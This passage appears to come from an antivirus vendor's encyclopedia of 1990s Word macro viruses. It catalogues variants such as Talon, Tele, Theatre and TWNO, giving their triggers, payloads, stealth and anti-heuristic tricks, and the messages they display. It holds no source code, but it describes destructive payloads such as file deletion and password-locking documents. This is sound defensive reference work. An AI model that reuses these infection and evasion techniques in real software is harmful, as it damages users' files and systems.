" c:\msoffice\excel\*.xls " (Microsoft Excel Spreadsheets) " c:\access\*.mdb " (Microsoft Access database files) " c:\msoffice\access\*.mdb " (Microsoft Access database files) " c:\windows\*.grp " (Windows files " c:\*.hlp " (Windows Help files) The second payload (located in AutoClose) checks the seconds time field and in case of a value of less than 10, it generates two random digits and changes all instances of 1. Example: "1" is replaced by "2" in the active document. In addition, the following messages can be found in the "AutoExec" macro: " *** I'm a little pest! *** " " The LITTLE PEST self-propagating macro is by *Sly Ellga*, " " a guy who thinks it's funny to screw around " with other people's data " [WORD_Swlabsl (Kit) (a.k.a. 1.0a)] Virus Name: WORD_Swlabs1 (Kit) (a.k.a. 1.0a) Virus Type: Word macro virus Size of executable: 117,248 Bytes Place of origin: USA Date of origin: January 1997 Description: Swlabs1 is another Microsoft Word construction kit written in Microsoft Visual C++ for Win32. It is presented as a text editor with a virus creation wizard. There are two ways of creating new viruses: 1. Virus source *only* if no copy of Microsoft Word is found. 2. Fully functional macro virus if Microsoft Word is found. Swlabs1 uses the document "SKAMMY.DOC" when communicating with Microsoft Word. It contains the macro "Test" (2137 Bytes), which pastes the source from the clipboard, breaks them into different macros and then exits Word to go back to the Swlabs construction kit. [WORD_Swlabs.A (aka. Skam)] Virus name: WORD_Swlabs.A (aka. Skam) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 512 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: Yes Description: Swlabs.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Swlabs.A removes ToolsMacro and FileTemplates to make recognition of an infected file more difficult (called macro stealth technique). It does not contain any payload only the following comment: " What" No Payload? WUSSY! " Swlabs.A is another virus that was created with a macro virus generator. [WORD_Swlabs.B] Virus name: WORD_Swlabs.B Virus Type: Word macro virus Number of macros: 3 Encrypted: No Macro names: AutoOpen, FileNew, FileSave Size of macros: 2145 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Swlabs.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen), created (FileNew), or saved (FileSave). Swlabs.B does not contain any destructive payload only the following comment is added to the File|Properties\Summary| Subject section: " Green Bay Packers -- Super Bowl XXXI Champions " Swlabs.B is another virus that was created with a macro virus generator. [WORD_Talon.A] Virus name: WORD_Talon.A Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: AOB, Deed, FSAB, Info, AutoOpen (FileSaveAs), ToolsMacro Size of macros: 2052 Bytes in documents 2008 Bytes in global template Place of origin: USA Date of origin: March 1997 Payload: Yes Seen In-The-Wild: No Description: Talon infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). Talon triggers on June 18th. It then displays an unending series of message boxes: " Your System Is Infected With The Macro Virus Talon #1! " " This Macro Virus Was Brought To You By: TALON 1997 ". When the user tries to select the "ToolsMacro" menu option, Talon displays the following information: " Warning " " This Option Is Not Available, Please Insert The MS-Office CD " " And Install The Help Files To Continue. " Additional information can be found in the "Info" macro: " ********************************************* " " Talon #1 " " June 18 Payload Activates " " Displays Message " " All Files Encrypted Except Info File " " " " Brought To You By " " "Talon" " " ********************************************* " [WORD_Talon.B] Virus name: WORD_Talon.B Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs), ToolsMacro, Password Size of macros: 1953 Bytes in documents 1887 Bytes in global template Place of origin: USA Date of origin: March 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.B infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). It triggers on the 27th of each month when it saves the active document with the password " talon " and then displays the following message: " Warning " " Your document Has Just been Been Saved, I Hope You Know " " The Password!!! ", Brought To You By Talon 1997 " Another difference between this new variant and the original Talon virus is that the "ToolsMacro" menu option displays the following information: " This Option Is Not Available, Please Install The " " Help Files To Continue. " [WORD_Talon.C] Virus name: WORD_Talon.C Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs), ToolsMacro, ToolsSpelling Size of macros: 2001 Bytes in documents 1981 Bytes in global template Place of origin: USA Date of origin: March 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.C infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). It triggers on Mondays during the month of June. This only happens when a user activates the spellchecker. Talon.C then saves the active document with the password " talon3 " and then loops through three message boxes: " I Have A Word For You To Spell V I R U S " " Your document Has Just been Been Saved By The Word Macro Virus " " Talon #3, I Hope You Know The Password!!! " " Brought To You By Talon 1997 " Another difference between this new variant and the original Talon virus is that the "ToolsMacro" menu option displays the following information: " This option is not available now. Please install the " " HELP files To continue. " [WORD_Talon.D] Virus name: WORD_Talon.D Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: Scramble, AutoClose, Info, AutoOpen, FileSaveAs, ToolsMacro Size of macros: 2079 Bytes Place of origin: USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.D infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs) or closed (AutoClose). It triggers on Fridays when it saves the active document with the password " talon4 " and then loops through the following message boxes: " Your document Is Infected With The Macro Virus Talon 4 " " Your document Has Just been Been Saved, I Hope You Know " " The Password!!! ", " Talon Strikes Again 1997 " Another difference between this new variant and the original Talon virus is that the "ToolsMacro" menu option displays the following information: " This option is not available right now. Please install the " " HELP files To continue. " [WORD_Talon.E] Virus name: WORD_Talon.E Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: Scramble, AutoClose, Info, Menu, AutoOpen, FileSaveAs, ToolsMacro Size of macros: 2323 Bytes Place of origin: USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.E infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs) or closed (AutoClose). The main difference between this new variant and the previous Talon viruses is that this virus adds a new menu item (Talon). When a user selects the item, Talon.E triggers and the active document is saved with the password " talon5 ". After that it enters a loop of message boxes: " Thank You so Much For Pressing That Button, " " I Thought I Would Never Be Activated. " " Word Macro Virus Talon 5 " " Talon Strikes Again " Another difference between this new variant and the original Talon virus is that the "ToolsMacro" menu option displays the following information: " This option is not available right now. Please install the " " HELP files To continue. " [WORD_Talon.F] Virus name: WORD_Talon.F Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: Scramble, AutoClose, Info, AutoOpen, FileSaveAs, ToolsMacro Size of macros: 2194 Bytes Place of origin: USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.F infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs) or closed (AutoClose). The main difference between this new variant and the previous Talon viruses is that the virus author tried the anti-heuristic techniques. Another difference between this new variant and the very similar Talon.D variant is that the "ToolsMacro" menu option displays the following information: " Please Install The HELP Files To Continue " " Option Not Installed " [WORD_Talon.G] Virus name: WORD_Talon.G Virus Type: Word macro virus Number of macros: 7 Encrypted: No Macro names: Scramble, AutoClose, Scramble2, AutoOpen, FileSaveAs, ToolsMacro, Mentor Size of macros: 6280 Bytes Place of origin: USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.G infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs) or closed (AutoClose). The main difference between this new variant and the previous Talon viruses is that Talon.G adds two menu items to the Help file (called "Talon 5" and "About Talon 5"). When selected, Talon triggers and displays an article from the virus author in the Microsoft Word macro editor. It then prints 999 copies of the article and displays the following messages: " Talon Strikes Again " " Word Macro Virus Talon 5 AKA The Mentor " [WORD_Talon.H] Virus name: WORD_Talon.H Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoClose, AutoOpen, Crud, FileSaveAs Size of macros: 1923 Bytes Place of origin: USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Talon.H infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs) or closed (AutoClose). The main difference between this new variant and the previous Talon viruses is that Talon.H adds two menu items (called Eifel Crud). When selected, Talon.H triggers and saves the active document with the password " crud ". After that it creates a new document with the following text: " You are infected with the Eifel Crud! " " Talon Strikes Again! 1997 " Talon.H is another virus that devolves into Talon.H1 and Talon.H2. This occurs when closing (AutoClose) a Talon.H infected document and saving (FileSaveAs) a Talon.H1 infected file. Due to the missing macros, Talon.H1 and Talon.H2 will produce WordBasic error messages. [WORD_Target.B (a.k.a LoneStar, Lone)] Virus name: WORD_Target.B (a.k.a LoneStar, Lone) Virus Type: Word macro virus Number of macros: 1 (German version of Word) 2 (Any other version of Word) Encrypted: Yes Macro names: LoneRaider (LoneRaiderTwo) Size of macros: 3463 Bytes Place of origin: Germany Date of origin: Unknown Destructive: No Common In-The-Wild: No Target activates when the assigned key (SPACE) is pressed. Target is an attempt to fool heuristic macro virus scanners. Its virus macros do not contain the command to copy viruses. Instead it creates a second macro (LoneRaiderTwo) and copies all the commands for activation and infection into it. After execution the second macro is deleted. As a result, some heuristic scanners do not flag Target as suspicious. When Target is activated from a non-German version of Microsoft Word it will not spread and the second macro will not be deleted. Upon pressing "SPACE" on January 1st of each year, Target creates a new document with the following text: " Enjoy the first F/WIN Killer! " " LoneRaider! " " Nightmare Joker " " 1996 " When Target was released to the public, F-WIN Heuristic Anti-Virus, written by Stefan Kurtzhals, was unable to detect Target due to the reasons above. This was changed immediately and every up-to-date anti-virus program should be able to catch this virus. [WORD_Tear.A] Virus name: WORD_Tear.A Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, FileSaveAs) Size of macros: 1684 Bytes Place of origin: Russia Date of origin: April 1997 Destructive: No Seen In-The-Wild: No Description: Tear.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). The following comments can be found in the "AutoOpen" macro code: " (c) 1997 Master of Infection " " QUEEN FOREVER!!! " " I love you,Freddie!!! " " Here is my Mother's love!!! " " I don't want to sleep with you " " I don't need the passion too " " I don't want a stormy affair " " To make me feel my life is heading somewhere " " All I want is comfort and care " " Just to know that my woman gives me sweet - " " Mother Love " " I've walked too long in this lonely lane " " I've had enough of this same old game " " I'm a man of the world and they say that I'm strong " " But my heart is heavy, and my hope is gone " " Out in the city, in the cold world outside " " I don't want to pity, just a safe place to hide " " Mama please, let me back inside " " I don't want to make no waves " " But you can give me all the love that I crave " " I can't take it if you see me cry " " I long for peace before I die " " All I want is to know that you're there " " You're gonna give me all your sweet - " " Mother Love " " My body's aching, but I can't sleep " " My dreams are all the company I keep " " Got such a feeling as the sun goes down " " I'm coming home to my sweet - " " Mother Love " When an infected document is opened, Tear displays the following message: " Tear it up! " [WORD_Tedious.A] Virus name: WORD_Tedious.A Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoNew, FileSaveAs, VAutoNew, VFileSaveAs Size of macros: 1082 Bytes Place of origin: Unknown Date of origin: August 1996 Payload: No Common In-The-Wild: No Description: Tedious infects documents when the "FileSaveAs" command is used. Infected documents are converted internally to templates which is very common for macro viruses. Since Tedious uses English macro names it will not work with Non-English versions of Microsoft Word. Even though one major US anti-virus company reported Tedious as being destructive, users do not need to fear this virus. Tedious is harmless and does nothing else besides replicating. [WORD_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)] Virus name: WORD_Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex) Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken, DateiNeu, DateiOeffnen, Telefonica Size of macros: 22256 Bytes Place of origin: Germany Date of origin: April 1996 Destructive: Yes Common In-The-Wild: No Description: Tele's "AutoExec" macro includes the infection routine for the global template (normal.dot), which will not get infected when inside the WIN.INI file (entry "Compatibility"), the string "0x0030303" is set to "LBYNJ". Tele uses the "Telefonica" macro to check for a previous infection. It will not infect the global template if the macro is already present. Documents are infected upon "DateiBeenden" ("FileClose"), "DateiNeu" ("FileNew") and "DateiOeffnen" ("FileOpen"), whereby at the end of "DateiOeffnen" ("FileOpen") the macro "Telefonica" is called again. Infected documents are changed to templates, which is very common for macro viruses. Tele has two destructive payloads. The first one can be found in the "DateiDrucken" (FilePrint) macro. Upon printing a document, Tele checks the system time and in case of a value less than 10 in the seconds field, it will add the following text at the end of the printed document: " Lucifer by Nightmare Joker (1996) " The second payload is activated from the "Telefonica" macro when the second field has a value of 0 or 1. ("Telefonica" is called from "AutoOpen", "AutoExec" and "DateiOeffnen"). If this is the case, Tele creates a Debug script, (filename: TELEFONI.SCR), inside the "C:\DOS" directory which includes the DOS-based virus "Kampana.3784". After creating the script file, LBYNJ executes the "TELEFONI.BAT" batch file which uses the DOS command "DEBUG.EXE" to convert the script file into an executable DOS-based virus and then starts it. [WORD_Temple.A] Virus name: WORD_Temple.A Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen (TempAutoOpen), TempAutoExec (AutoExec) TempFileOpen (FileOpen), TempFileSave (FileSave) Size of macros: 1011 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Temple is another do-nothing macro virus. It is only infectious. Temple.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen) or saved (FileSaveAs). [WORD_Theatre.A (a.k.a Taiwan.Theater)] Virus name: WORD_Theatre.A (a.k.a Taiwan.Theater) Virus Type: Word macro virus Number of macros: 6 Encrypted: Yes Macro names: AutoOpen, CK, CK1, DocClose, FileClose, ToolsMacro Size of macros: 7495 Bytes Place of origin: Taiwan Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Theatre is another macro virus written for the Taiwanese/Chinese version of Microsoft Word. It activates when an infected file is opened. Upon the 1st of each month, Theatre triggers and deletes all the files in the C:\ root directory. This leaves the computer unbootable. The following messages are displayed: " TAIWAN THEATRE VIRUS by Dark Word " " Hay..Hay..YOU GOT A THEATRE VIRUS. " [WORD_Theater.B] Virus name: WORD_Theatre.B Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: CK, DocClose, FileClose, ToolsMacro Size of macros: 7495 Bytes Place of origin: Taiwan Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Theatre.B is another macro virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the original Theatre virus is the trigger date and the displayed message. Theatre.B deletes all the files in the C:\ root directory upon reaching the 15th of each month. It displays the following message: " THEATRE " Our Theatre.B virus sample also contains errors in the "FileClose" macro, which results to no further infections. [WORD_Toten.A:De] Virus name: WORD_Toten.A:De Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: README, AutoOpen (DateiSpeichern) Size of macros: 2057 Bytes Place of origin: Germany Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: Yes Description: Toten infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (DateiSpeichern). When Toten triggers, it encrypts documents with semi-random passwords. If you find a document with an unknown password, please download a copy of WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.com. When a document is saved on February 1, 2000, Toten displays the following German message: " Der Virus wurde von M.N. aus Schwelm (BRD)am 08.06.1996 " " programmiert. Ich bin ein Hosen Fan. " Toten contains several other comments related to the German punk music group: " Die Toten Hosen ". Toten.A uses language specific macros, therefore it only works with the German version of Microsoft Word. [WORD_Twister.A] Virus name: WORD_Twister.A Virus Type: Word macro virus Number of macros: 8 Encrypted: No Macro names: FileSaveAs, AutoExec, twAC, FileSave, AutoExit, twFC, twFE, twFQ, twFSA, twAE, AutoClose, twFS, twEX, FileClose, FileExit, FileQuit Size of macros: 4628 Bytes Place of origin: Unknown Date of origin: Unknown Payload: No Seen In-The-Wild: No Description: Twister is a very simple virus that does nothing but replicate. It has 2 sets of macros: one for infecting the global template the other for infecting documents. It swaps them upon activation and upon infection. The AutoExec macro contains the following text string: " Twister 2000" v.1 (c) Neo-Luddite Inc. " " For Robin Hood " [WORD_TWNO.A (a.k.a. Taiwan_1)] Virus name: WORD_TWNO.A (a.k.a. Taiwan_1) Virus Type: Word macro virus Alias: WORD_Taiwan.No-1 Number of macros: 1 or 3 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose Size of macros: 1567 Bytes in .doc files 4701 Bytes in global template Place of origin: Taiwan Date of origin: Unknown Payload: Yes Seen In-The-Wild: Yes Description: TWNO was the first macro virus written for the Taiwanese/Chinese version of Microsoft Word. TWNO infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened (AutoOpen), closed (AutoClose) or when a new document is created (AutoNew). While TWNO has only one macro in infected documents, it copies and renames it to 3 macros in the global template. On the 13th of each month TWNO inserts text into the active document and then displays the following message: " NO_1 Macro Virus " [WORD_Taiwan.No-1] Virus name: WORD_Taiwan.No-1 Virus Type: Word macro virus Alias: WORD_TWNO.A Number of macros: 1 or 3 Encrypted: No Macro names: AutoOpen, AutoNew, AutoClose Size of macros: 1567 Bytes in .doc files 4701 Bytes in global template Place of origin: Taiwan Date of origin: Unknown Payload: Yes Seen In-The-Wild: Yes Description: TWNO was the first macro virus written for the Taiwanese/Chinese version of Microsoft Word. TWNO infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened (AutoOpen), closed (AutoClose) or when a new document is created (AutoNew). While TWNO has only one macro in infected documents, it copies and renames it to 3 macros in the global template. On the 13th of each month TWNO inserts text into the active document and then displays the following message: " NO_1 Macro Virus " [WORD_TWNO.B (a.k.a. KillMario)] Virus name: WORD_TWNO.B (a.k.a. KillMario) Virus Type: Word macro virus Number of macros: 1 or 3 Encrypted: No Macro names: AutoExec, AutoNew, AutoClose Size of macros: 1387 Bytes in .doc files 4161 Bytes in global template Place of origin: Taiwan Date of origin: Unknown Payload: No Seen In-The-Wild: No Description: TWNO.B is another virus written for the Taiwanese/ Chinese version of Microsoft Word. The difference between this new variant and the original TWNO.A virus is that TWNO.B contains the "AutoExec" macro instead of the "AutoOpen" macro. The submitted first generation sample is also not capable of further infecting documents. Microsoft Word is halted when the user starts Word from an already infected global template. [WORD_TWNO.C] Virus name: WORD_TWNO.C Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1404 Bytes in documents 4212 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.C is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.B virus is that it contains an "AutoOpen" macro instead of "AutoExec". TWNO.C infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). While TWNO.B is not capable of further infecting documents, TWNO.C is able to infect new documents and also execute its destructive payloads. On the 28th of each month, TWNO.C asks a question and depending on the answer, it executes one of its two payloads: 1. It deletes CONFIG.SYS, AUTOEXEC.BAT, and COMMAND.COM! 2. It deletes all files in the C:\DOS and C:\ET3 directory. On the 1st of each month, TWNO.C deletes the following files: C:\COMMAND.COM C:\AUTOEXEC.BAT C:\CONFIG.SYS [WORD_TWNO.D] Virus name: WORD_TWNO.D Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 2105 Bytes in documents 6315 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.D is another virus written for the Taiwanese/Chinese version of Microsoft Word. Compared to previous TWNO viruses, its WordBasic code has been rewritten. TWNO.D infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). On the 25th of each month, TWNO.D changes the Word menubar items and then asks a question to the user. Depending on the answer, it deletes the following files: "C:\DOS\*.*" "C:\WINDOWS\*.INI" After that TWNO.D shows 3 different messages. On the 15th of each month, TWNO.D deletes the following files: "C:\COMMAND.COM" "C:\CONFIG.SYS" "C:\MSDOS.SYS" "C:\IO.SYS" [WORD_TWNO.K] Virus name: WORD_TWNO.K Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1403 Bytes in documents 4209 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.K is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.K infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.L] Virus name: WORD_TWNO.L Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1402 Bytes in documents 4206 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.L is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.L infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.M] Virus name: WORD_TWNO.M Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1392 Bytes in documents 4176 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.M is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.M infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.N] Virus name: WORD_TWNO.N Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1264 Bytes in documents 3792 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.N is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.N infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.O] Virus name: WORD_TWNO.O Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1406 Bytes in documents 4218 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.O is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.O infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.P] Virus name: WORD_TWNO.P Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1404 Bytes in documents 4212 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.P is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.P infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.Q] Virus name: WORD_TWNO.Q Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1286 Bytes in documents 3858 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.Q is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.Q infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.R] Virus name: WORD_TWNO.R Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1214 Bytes in documents 3642 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.R is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.R infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.S] Virus name: WORD_TWNO.S Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1212 Bytes in documents 3636 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.S is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.S infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.T] Virus name: WORD_TWNO.T Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 1206 Bytes in documents 3618 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.T is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.T infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.U] Virus name: WORD_TWNO.U Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 970 Bytes in documents 2910 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.U is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.U infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.V] Virus name: WORD_TWNO.V Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 924 Bytes in documents 2772 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.V is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.V infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.W] Virus name: WORD_TWNO.W Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 888 Bytes in documents 2664 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.W is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.W infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TWNO.X] Virus name: WORD_TWNO.X Virus Type: Word macro virus Number of macros: 1 or 3 (global template) Encrypted: No Macro names: AutoOpen (AutoNew, AutoClose) Size of macros: 872 Bytes in documents 2616 Bytes in global template Place of origin: Taiwan Date of origin: Fall 1996 Destructive: Yes Seen In-The-Wild: No Description: TWNO.X is another virus written for the Taiwanese/Chinese version of Microsoft Word. The difference between this new variant and the previous TWNO.C virus is that the code was slightly modified. TWNO.X infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose), created (AutoNew) or opened (AutoOpen). For additional information, please refer to the TWNO.C virus description. [WORD_TwoLines.A] Virus name: WORD_TwoLines.A Virus Type: Word macro virus Number of macros: 5 and 4 for A1 Encrypted: Yes Macro names: MSRun, AutoExec, AutoOpen, AutoClose, FileSaveAs Size of macros: 1817 Bytes or 1767 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: TwoLines infects the global template when an infected document is opened (AutoOpen) or closed (AutoClose). As the name suggests it adds 2 empty lines to the active document when the minute field of the system time shows 20 minutes. Responsible for this action is the "MsRun" macro. The "FileSaveAs" macro converts documents to templates, yet does not infect them. Twolines.A devolves into Twolines.A1, which does not contain the "FileSaveAs" macro. For this to happen certain conditions have to be present: 1. Automacros are disabled when opening an infected document. 2. Document is closed (AutoClose). 3. Global template contains macros. [WORD_UglyKid.A] Virus name: WORD_Uglykid.A Virus Type: Word macro virus Number of macros: 3-4 Encrypted: Yes Macro names: AutoOpen, (ToolsMacro, FileSave) Size of macros: Polymorphic Place of origin: Slovakia Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Uglykid.A is another Polymorphic macro virus, that can not be detected 